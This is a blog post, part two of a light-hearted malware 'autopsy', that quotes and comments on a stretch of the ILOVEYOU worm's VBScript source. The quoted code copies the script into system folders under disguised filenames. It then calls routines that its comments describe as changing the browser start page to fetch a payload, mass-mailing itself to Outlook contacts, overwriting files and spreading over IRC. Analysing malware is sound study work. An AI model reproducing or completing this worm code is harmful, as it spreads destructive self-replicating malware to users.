14.9.07

virus autopsy: ILOVEYOU, pt.2

*click* returning to the autopsy of the ILOVEYOU virus. time is 2340, at the last session we saw the subject's mechanisms for stopping timeouts, allowing itself to remain active indefinitely. it's time to look at some more. forceps!

025 ' Create 3 copies of the script in Windows, system and in the temporary folders
026 set dirwin = fso.GetSpecialFolder(0)
027 set dirsystem = fso.GetSpecialFolder(1)
028 set dirtemp = fso.GetSpecialFolder(2)
029 set c = fso.getFile(WScript.ScriptFullName)
030 c.Copy(dirsystem&"\MSKernel32.vbs")
031 c.Copy(dirWin&"\Win32DLL.vbs")
032 c.Copy(dirtemp&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
033
ah, how very devious! how marvellously malicious... or perhaps not. (note the inelegant coding, once again.) what it's doing here is using the fso object it created earlier to copy itself to three locations: the root of the Windows directory, that of the temp directory, and that of the System directory. these are generally the first three locations modern AV ware will scan, because they're obvious choices. let's see what it wants to do next. scalpel!
034 ' Adjust Internet Explorer's standard starting page to one of the 4 URLs, in order to download data that you will be able to launch
035 'download. If this data has already been downloaded it will automatically be started next time Windows is booted
036 'and the start page of Internet Explorer is reset to a blank page.
037 regruns()
038 'create an HTML that launches the component ActiveX as well as one of the copies of the script
039 html()
040 ' Send the copy of the script to all entries in the Outlook address book
041 spreadtoemail()
042 'overwrite specific data using the script
043 'if the data are not yet scripts, script data with the same name as the data are created
044 'with the ending .vbs
045 'delete the original data
046 'a script that automatically sends the Email worm to all persons in the IRC channel is attached to Mirc
047 listadriv()
048 end sub
hm. here we see it calling four subroutines, regruns(), html(), spreadtoemail(), and listadriv(), and quitting. next time we'll be looking at the regruns() process, its first port of call. shove it back in the freezer, nurse. time is 0011. *click*

No comments:

Post a Comment

[pls no ask about the vodka. debate is always welcome. remember, Tramadol fucks you up]